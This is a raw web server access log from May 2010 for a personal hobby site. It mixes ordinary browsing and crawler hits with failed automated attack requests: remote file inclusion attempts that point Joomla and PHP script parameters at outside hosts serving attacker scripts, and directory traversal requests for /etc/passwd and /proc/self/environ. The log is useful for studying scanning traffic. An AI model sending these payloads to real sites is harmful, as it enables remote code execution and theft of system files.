124.0.74.195 - - [11/May/2010:08:41:38 -0500] "GET /logs//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
124.0.74.195 - - [11/May/2010:08:41:38 -0500] "GET /logs/access_log.1225497600//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
207.46.13.47 - - [11/May/2010:08:41:42 -0500] "GET /logs/access_log.1159488000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [11/May/2010:08:42:05 -0500] "GET /logs/access_log.1272585600 HTTP/1.0" 200 433875 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.240.8.178 - - [11/May/2010:08:43:02 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:05 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:05 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:05 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:06 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:06 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:06 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:06 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:06 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:06 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:06 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:06 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:14 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:14 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:14 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:14 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:14 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:14 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:14 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:14 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:14 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:14 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:14 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
211.189.18.242 - - [11/May/2010:08:43:20 -0500] "GET /logs/access_log.1273190400///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.803"
66.240.8.178 - - [11/May/2010:08:43:25 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:25 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:25 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:25 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:25 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:25 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:25 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:25 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:25 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:25 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:25 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:36 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:36 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:36 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:36 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:36 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:36 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:36 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:36 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:36 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:36 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:37 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:43 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:43 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:43 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:43 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
66.240.8.178 - - [11/May/2010:08:43:48 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14 (.NET CLR 3.5.30729)"
124.0.74.195 - - [11/May/2010:08:46:53 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
124.0.74.195 - - [11/May/2010:08:46:53 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
124.0.74.195 - - [11/May/2010:08:46:53 -0500] "GET /logs/access_log.1273190400//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
124.0.74.195 - - [11/May/2010:08:46:53 -0500] "GET /logs/access_log.1273190400%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
124.0.74.195 - - [11/May/2010:08:46:53 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
124.0.74.195 - - [11/May/2010:08:46:53 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
124.0.74.195 - - [11/May/2010:08:48:45 -0500] "GET /logs/access_log.1272067200%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.gigacenter.cl//tmp/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
208.115.111.248 - - [11/May/2010:08:49:22 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
65.55.37.203 - - [11/May/2010:08:54:44 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.37.203 - - [11/May/2010:08:55:18 -0500] "GET /logs/access_log.1166659200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
75.126.213.59 - - [11/May/2010:09:02:14 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
91.76.99.89 - - [11/May/2010:09:08:47 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
91.76.99.89 - - [11/May/2010:09:09:36 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
91.76.99.89 - - [11/May/2010:09:09:57 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
121.73.213.91 - - [11/May/2010:09:11:01 -0500] "GET /koesubmit.php?mosConfig_absolute_path=http://roll3r.electroniktribulationarmy.com/gny.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.834"
121.73.213.91 - - [11/May/2010:09:11:01 -0500] "GET /logs/koesubmit.php?mosConfig_absolute_path=http://roll3r.electroniktribulationarmy.com/gny.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.834"
121.73.213.91 - - [11/May/2010:09:11:01 -0500] "GET /logs/access_log.1270857600/koesubmit.php?mosConfig_absolute_path=http://roll3r.electroniktribulationarmy.com/gny.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.834"
207.46.199.193 - - [11/May/2010:09:11:43 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.43 - - [11/May/2010:09:14:10 -0500] "GET /logs/access_log.1169251200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.43 - - [11/May/2010:09:14:52 -0500] "GET /costume/thmb5.htm HTTP/1.1" 200 3414 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
75.126.213.59 - - [11/May/2010:09:22:09 -0500] "GET /logs/access_log.1272067200//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
75.126.213.59 - - [11/May/2010:09:22:09 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
75.126.213.59 - - [11/May/2010:09:22:09 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
218.149.84.14 - - [11/May/2010:09:27:28 -0500] "GET /logs/access_log.1268956800%20%20/xGB.php?act=admin&do=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:09:27:28 -0500] "GET /logs/xGB.php?act=admin&do=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:09:27:28 -0500] "GET /xGB.php?act=admin&do=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:09:28:24 -0500] "GET /logs/access_log.1270598400%20%20/xGB.php?act=admin&do=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
75.126.213.59 - - [11/May/2010:09:30:29 -0500] "GET /logs/access_log.1272067200//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
75.126.213.59 - - [11/May/2010:09:30:29 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
75.126.213.59 - - [11/May/2010:09:30:29 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
218.149.84.14 - - [11/May/2010:09:33:47 -0500] "GET /logs/access_log.1268956800%20%20/xGB.php?act=admin&do=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:09:33:47 -0500] "GET /xGB.php?act=admin&do=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:09:33:47 -0500] "GET /logs/xGB.php?act=admin&do=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
218.149.84.14 - - [11/May/2010:09:34:24 -0500] "GET /logs/access_log.1270598400%20%20/xGB.php?act=admin&do=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.115.111.248 - - [11/May/2010:09:35:13 -0500] "GET /artwork/artmaster.htm HTTP/1.1" 200 886 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:09:35:15 -0500] "GET /artwork/carousel.htm HTTP/1.1" 200 814 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:09:35:18 -0500] "GET /artwork/dioramas.htm HTTP/1.1" 200 1230 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:09:35:20 -0500] "GET /artwork/furniture.htm HTTP/1.1" 200 1004 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:09:35:22 -0500] "GET /artwork/hospitals.htm HTTP/1.1" 200 3315 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:09:35:25 -0500] "GET /artwork/paintings.htm HTTP/1.1" 200 2300 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:09:35:27 -0500] "GET /artwork/playhouse.htm HTTP/1.1" 200 521 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:09:35:30 -0500] "GET /artwork/postcards.htm HTTP/1.1" 200 690 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:09:35:32 -0500] "GET /artwork/sculptures.htm HTTP/1.1" 200 3706 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [11/May/2010:09:35:34 -0500] "GET /artwork/whirligigs.htm HTTP/1.1" 200 985 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
59.42.10.71 - - [11/May/2010:09:42:33 -0500] "GET /logs/access_log.1272067200/index.php?option=com_lurm_constructor&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
59.42.10.71 - - [11/May/2010:09:42:33 -0500] "GET /index.php?option=com_lurm_constructor&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
59.42.10.71 - - [11/May/2010:09:42:34 -0500] "GET /logs/index.php?option=com_lurm_constructor&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
174.36.146.79 - - [11/May/2010:09:42:48 -0500] "GET /logs/access_log.1273276800//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
174.36.146.79 - - [11/May/2010:09:42:48 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
174.36.146.79 - - [11/May/2010:09:42:48 -0500] "GET /logs//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
188.165.16.155 - - [11/May/2010:09:43:33 -0500] "GET /logs/access_log.1219968000 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
216.129.119.10 - - [11/May/2010:09:45:40 -0500] "GET /logs/access_log.1232668800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.195.112.180 - - [11/May/2010:09:48:18 -0500] "GET /logs/access_log.1237507200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
111.89.128.186 - - [11/May/2010:09:50:27 -0500] "GET //poll/poll_ssi.php?include_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
111.89.128.186 - - [11/May/2010:09:50:27 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://redf.interfree.it/id.jpg?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
